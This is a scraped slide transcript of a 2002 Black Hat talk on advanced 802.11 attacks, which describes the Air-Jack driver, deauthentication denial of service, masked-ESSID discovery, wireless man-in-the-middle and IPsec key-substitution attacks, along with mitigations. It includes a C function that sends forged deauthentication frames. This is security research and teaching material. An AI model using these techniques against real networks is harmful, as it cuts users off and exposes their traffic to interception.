7/31/2002Black Hat 2002, Las Vegas NV Advanced 802.11 Attack Mike Lynn & Robert Baird.

Slides:



Advertisements
Similar presentations
Internet Protocol Security (IP Sec)
Advertisements

Information Networking Security and Assurance Lab National Chung Cheng University Kai, 2004 INSA1 Using Kismet to enhance the security level in enterprise.
“All your layer are belong to us” Rogue APs, DHCP/DNS Servers, and Fake Service Traps.
Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.
Chapter 13 IPsec. IPsec (IP Security)  A collection of protocols used to create VPNs  A network layer security protocol providing cryptographic security.
1 MD5 Cracking One way hash. Used in online passwords and file verification.
Final Presentation Presented By: Gal Leibovich Liran Manor Supervisor: Hai Vortman.
WiFi Security. What is WiFi ? Originally, Wi-Fi was a marketing term. The Wi-Fi certified logo means that the product has passed interoperability tests.
WEP Weaknesses Or “What on Earth does this Protect” Roy Werber.
Wired Equivalent Privacy (WEP)
Security in Wireless LAN Layla Pezeshkmehr CS 265 Fall 2003-SJSU Dr.Mark Stamp.
Man in the Middle Paul Box Beatrice Wilds Will Lefevers.
Kemal AkkayaWireless & Network Security 1 Department of Computer Science Southern Illinois University Carbondale Wireless and Network Security Lecture.
& WEP Tzachy Reinman System and Network Security Course
1 Wireless LAN Security Presented by Vikrant Karan.
IEEE Wireless Local Area Networks (WLAN’s).
Wireless Security Presentation by Paul Petty and Sooner Brooks-Heath.
WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.
CCNA Exploration Semester 3 Modified by Profs. Ward and Cappellino
Improving Security. Networking Terms Node –Any device on a network Protocol –Communication standards Host –A node on a network Workstation 1.A PC 2.A.
Wireless Security Issues David E. Hudak, Ph.D. Senior Software Architect Karlnet, Inc.
Wireless LAN Security Yen-Cheng Chen Department of Information Management National Chi Nan University
WLAN What is WLAN? Physical vs. Wireless LAN
What is in Presentation What is IPsec Why is IPsec Important IPsec Protocols IPsec Architecture How to Implement IPsec in linux.
Chapter 6 Configuring, Monitoring & Troubleshooting IPsec
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Troubleshooting Your Network Networking for Home and Small Businesses.
8: Network Security8-1 Security in the layers. 8: Network Security8-2 Secure sockets layer (SSL) r Transport layer security to any TCP- based app using.
Wireless security & privacy Authors: M. Borsc and H. Shinde Source: IEEE International Conference on Personal Wireless Communications 2005 (ICPWC 2005),
© 2006 Cisco Systems, Inc. All rights reserved.Cisco PublicITE I Chapter 6 1 Wireless Router LAN Switching and Wireless – Chapter 7.
ECE 424 Embedded Systems Design Networking Connectivity Chapter 12 Ning Weng.
Wireless Networking.
Wireless Network Security Dr. John P. Abraham Professor UTPA.
Wireless Security Beyond WEP. Wireless Security Privacy Authorization (access control) Data Integrity (checksum, anti-tampering)
CWNA Guide to Wireless LANs, Second Edition
Lesson 20-Wireless Security. Overview Introduction to wireless networks. Understanding current wireless technology. Understanding wireless security issues.
OV Copyright © 2013 Logical Operations, Inc. All rights reserved. Network Security  Network Perimeter Security  Intrusion Detection and Prevention.
Network Security Lecture 9 Presented by: Dr. Munam Ali Shah.
1 Section 10.9 Internet Security Association and Key Management Protocol ISAKMP.
OV Copyright © 2011 Element K Content LLC. All rights reserved. Network Security  Network Perimeter Security  Intrusion Detection and Prevention.
Presented by: Dr. Munam Ali Shah
1 C-DAC/Kolkata C-DAC All Rights Reserved Computer Security.
Intercepting Mobile Communications: The Insecurity of Nikita Borisov Ian Goldberg David Wagner UC Berkeley Zero-Knowledge Sys UC Berkeley Presented.
Shambhu Upadhyaya Security –Upper Layer Authentication Shambhu Upadhyaya Wireless Network Security CSE 566 (Lecture 10)
Lecture 14 ISAKMP / IKE Internet Security Association and Key Management Protocol / Internet Key Exchange CIS CIS 5357 Network Security.
CWSP Guide to Wireless Security Chapter 2 Wireless LAN Vulnerabilities.
WEP Protocol Weaknesses and Vulnerabilities
WEP AND WPA by Kunmun Garabadu. Wireless LAN Hot Spot : Hotspot is a readily available wireless connection.  Access Point : It serves as the communication.
Network Security David Lazăr.
Network Security7-1 Today r Reminder Ch7 HW due Wed r Finish Chapter 7 (Security) r Start Chapter 8 (Network Management)
20 November 2015 RE Meyers, Ms.Ed., CCAI CCNA Discovery Curriculum Review Networking for Home and Small Businesses Chapter 7: Wireless Technologies.
WLANs & Security Standards (802.11) b - up to 11 Mbps, several hundred feet g - up to 54 Mbps, backward compatible, same frequency a.
Attacking IPsec VPNs Charles D George Jr. Overview Internet Protocol Security (IPSec) is a suite of protocols for authenticating and encrypting packets.
Solving the Security Risks of WLAN Tuukka Karvonen
Wireless Security Rick Anderson Pat Demko. Wireless Medium Open medium Broadcast in every direction Anyone within range can listen in No Privacy Weak.
IPSec and TLS Lesson Introduction ●IPSec and the Internet key exchange protocol ●Transport layer security protocol.
CSE 5/7349 – April 5 th 2006 Wireless Networking.
Wireless Security John Himmelein Erick Andrew Christian Adam Varun Bapna.
IPSec is a suite of protocols defined by the Internet Engineering Task Force (IETF) to provide security services at the network layer. standard protocol.
1 © 2004, Cisco Systems, Inc. All rights reserved. Wireless LAN (network) security.
Erik Nicholson COSC 352 March 2, WPA Wi-Fi Protected Access New security standard adopted by Wi-Fi Alliance consortium Ensures compliance with different.
Security Data Transmission and Authentication Lesson 9.
By Billy Ripple.  Security requirements  Authentication  Integrity  Privacy  Security concerns  Security techniques  WEP  WPA/WPA2  Conclusion.
IEEE Wireless LAN Standard
Lecture 7 (Chapter 17) Wireless Network Security Prepared by Dr. Lamiaa M. Elshenawy 1.
Chapter-7 Basic Wireless Concepts and Configuration.
7/31/2002Black Hat 2002, Las Vegas NV Advanced Attack Michael Lynn & Robert Baird.
Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00
Wireless Network Security
WLAN Security Antti Miettinen.
Antti Miettinen (modified by JJ)
Presentation transcript:

7/31/2002Black Hat 2002, Las Vegas NV Advanced Attack Mike Lynn & Robert Baird

7/31/2002Black Hat 2002, Las Vegas NV What Is NOT Covered Wired Equiv. Privacy (WEP) vulnerabilities WEP Key cracking techniques Radio signal amplification Suggested changes to the IEEE b specification Wireless network discovery tools

7/31/2002Black Hat 2002, Las Vegas NV What Will Be Covered Wireless network best practices Practical attacks The focus of the attack(s) The network layers The bottom 2 layers Custom (forged) b management frames The Tool Box Drivers Utilities Proof of concept code

7/31/2002Black Hat 2002, Las Vegas NV What Will Be Covered Attack Scenarios Denial of service Masked ESSID detection b layer MITM attack Inadequate VPN implementations Mitigation Strategies

7/31/2002Black Hat 2002, Las Vegas NV Wireless Best Practices Enable WEP - Wired equivalent privacy Key rotation when equipment supports it Disable broadcast of ESSID Block null ESSID connection Restrict access by MAC address Use VPN technology Use strong mutual authentication

7/31/2002Black Hat 2002, Las Vegas NV Practical Attacks WEP – Can be cracked passively Masked ESSID – Can be passively observed in management frames during association Block null ESSID connects – Same problem Install VPN – Weakly authenticated VPN is susceptible to active attack (MITM) Strong mutual authentication - ?

7/31/2002Black Hat 2002, Las Vegas NV The Network Layers

7/31/2002Black Hat 2002, Las Vegas NV The Bottom Layers Manipulating the bottom 2 layers of the OSI Data Link (Layer 2)  Media Access Control (MAC) – Access to medium  Logical Link Control (LLC) – Frame sync, flow control Physical (Layer 1)  Radio bit stream  Divided into channels

7/31/2002Black Hat 2002, Las Vegas NV The Bottom Layers

7/31/2002Black Hat 2002, Las Vegas NV Management Frames Management frames can control link characteristics and physical medium properties b management frames are NOT authenticated Why is this bad?

7/31/2002Black Hat 2002, Las Vegas NV The Tool Box Custom Drivers Air-Jack  Custom driver for PrismII (HFA384x) cards  MAC address setting/spoofing  Send custom (forged) management frames  AP forgery/fake AP Lucent/Orinoco  Linux driver modified to allow MAC address setting/spoofing from the command line Utilities User space programs – wlan-jack, essid-jack, monkey-jack, kracker-jack

7/31/2002Black Hat 2002, Las Vegas NV Air-Jack Driver Allows control of wireless card modes Modes 0 and 1 standard documented modes  BSS (infrastructure) (1) or IBSS (0) (Ad-hoc) Pseudo-IBSS (3) mode  Control channel selection  Firmware handles timing sensitive functions Mode 5 - undocumented  Channel selection  Firmware handles time sensitive functions  No beacons sent  Very little firmware intervention

7/31/2002Black Hat 2002, Las Vegas NV Air-Jack Driver Mode 6 – Host Access Point mode  Sends Beacons (firmware control)  Responds to Probe request  Handles time sensitive functions Can enable PrismII monitor mode Uses Linux PF_PACKET interface for RX and TX of raw frames

7/31/2002Black Hat 2002, Las Vegas NV Air-Jack Driver void send_deauth (__u8 *dst, __u8 *bssid) { struct { struct a3_80211hdr; __u16reason; }frame; memset(&frame, 0, sizeof(frame)); frame.hdr.mh_type = FC_TYPE_MGT; frame.hdr.mh_subtype = MGT_DEAUTH; memcpy(&(frame.hdr.mh_mac1), dst, 6); memcpy(&(frame.hdr.mh_mac2), bssid, 6); memcpy(&(frame.hdr.mh_mac3), bssid, 6); frame.reason = 1; send(socket, &frame, sizeof(frame), 0); }

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – WLAN-Jack Denial of Service – De-authentication Use MAC address of Access Point Send deauthenticate frames  Send continuously  Send to broadcast address or specific MAC Users are unable to reassociate with AP Air-Jack + WLAN-Jack

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – WLAN-Jack

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – WLAN-Jack Airopeek Trace

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – WLAN-Jack Airopeek Trace

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – WLAN-Jack Decode of Deauthentication Frame

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – WLAN-Jack This is your connection

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – WLAN-Jack This is your connection on WLAN-Jack.

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – ESSID-Jack Is the ESSID a shared secret? If I mask the ESSID from the AP beacons then unauthorized users will not be able to associate with my AP? Discover Masked ESSID Send a deauthenticate frame to the broadcast address. Obtain ESSID contained in client probe request or AP probe response.

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – ESSID-Jack

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios - ESSID-Jack Airopeek Trace

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – ESSID-Jack Airopeek Trace

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – Monkey-Jack MITM Attack Taking over connections at layer 1 and 2 Insert attack machine between victim and access point Management frames Deauthenticate victim from real AP  Send deauthenticate frames to the victim using the access point’s MAC address as the source

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – Monkey-Jack Victim’s card scans channels to search for new AP Victim’s card associates with fake AP on the attack machine  Fake AP is on a different channel than the real one  Attack machine’s fake AP is duplicating MAC address and ESSID of real AP

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – Monkey-Jack Attack machine associates with real AP  Attack machine duplicates MAC address of the victim’s machine. Attack machine is now inserted and can pass frames through in a manner that is transparent to the upper level protocols

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – Monkey-Jack Before Monkey-Jack

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios Monkey-Jack After Monkey-Jack

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios - Monkey-Jack

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – Kracker-Jack Dangers of wireless MITM Wireless networks are more vulnerable to MITM attacks than wired networks. Many security solutions are implemented with an assumption of a secure layer 1 and 2 Many VPN solutions are implemented with inadequate authentication for protection against wireless MITM attacks.

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – Kracker-Jack WAVEsec An open source software solution for securing wireless networks Uses FreeS/WAN IPSEC implementation Will thwart passive eavesdropping of wireless network communications. Implementation options  X.509 Certificates  Secure DNS

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – Kracker-Jack Authenticating with WAVEsec gateway Client sends modified DHCP request with client’s public key WAVEsec gateway inserts client’s public key into DNS record Client obtains WAVEsec gateway’s public key by requesting it from the DNS server IPSEC tunnel setup

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – Kracker-Jack Using Kracker-Jack KJ inserts to layer (like monkey-jack) KJ, using a DNS request, gets victims public key from DNS server KJ, using the victims MAC address sends DHCP request with its own key to replace the victim’s key in the DNS server

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – Kracker-Jack KJ initiates ISAKMP main mode SA with the WAVEsec server KJ initiates ISAKMP main mode SA with victim Victim gets new server key by DNS request serviced by KJ Two separate IPSEC tunnels are now setup All traffic passes through KJ unencrypted

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – Kracker-Jack

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – Kracker-Jack IKE – ISAKMP/Oakley Phase 1  Messages 1 and 2 – negotiate characteristics of security association; no authentication  Messages 3 and 4 – exchange random values (nonce) and execute Diffie-Hellman exchange to establish a master key (SKEYID); no authentication  Messages 5 and 6 – exchange information for mutually authenticating the parties; identity payload, signature payload, and OPTIONAL certificate payload

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios – Kracker-Jack IKE – ISAKMP/Oakley Phase 2 – Oakley Quick Mode  Define Security Associations  Define keys used to protect IP datagrams

7/31/2002Black Hat 2002, Las Vegas NV Attack Scenarios Shared key authentication attack Observe plain text challenge Observe cipher text response XOR plain text with cipher text to get key stream XOR IP packet with key stream re-using IV Broadcast ping

7/31/2002Black Hat 2002, Las Vegas NV Mitigation Strategies Big guy with a stick Wireless IDS and Monitoring AirDefense VPN + Strong mutual authentication RF Signal shaping – Avoiding signal leaks Antennas with directional radiation pattern Lower Access Point power

7/31/2002Black Hat 2002, Las Vegas NV Summary Wireless networks are more susceptible to active attacks than wired networks Enable all built-in security capabilities Use VPN with strong mutual authentication Monitor wireless network medium (air space) for suspicious activity Updates – Black Hat web site or

7/31/2002Black Hat 2002, Las Vegas NV Advanced Attack Robert Baird & Mike Lynn

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.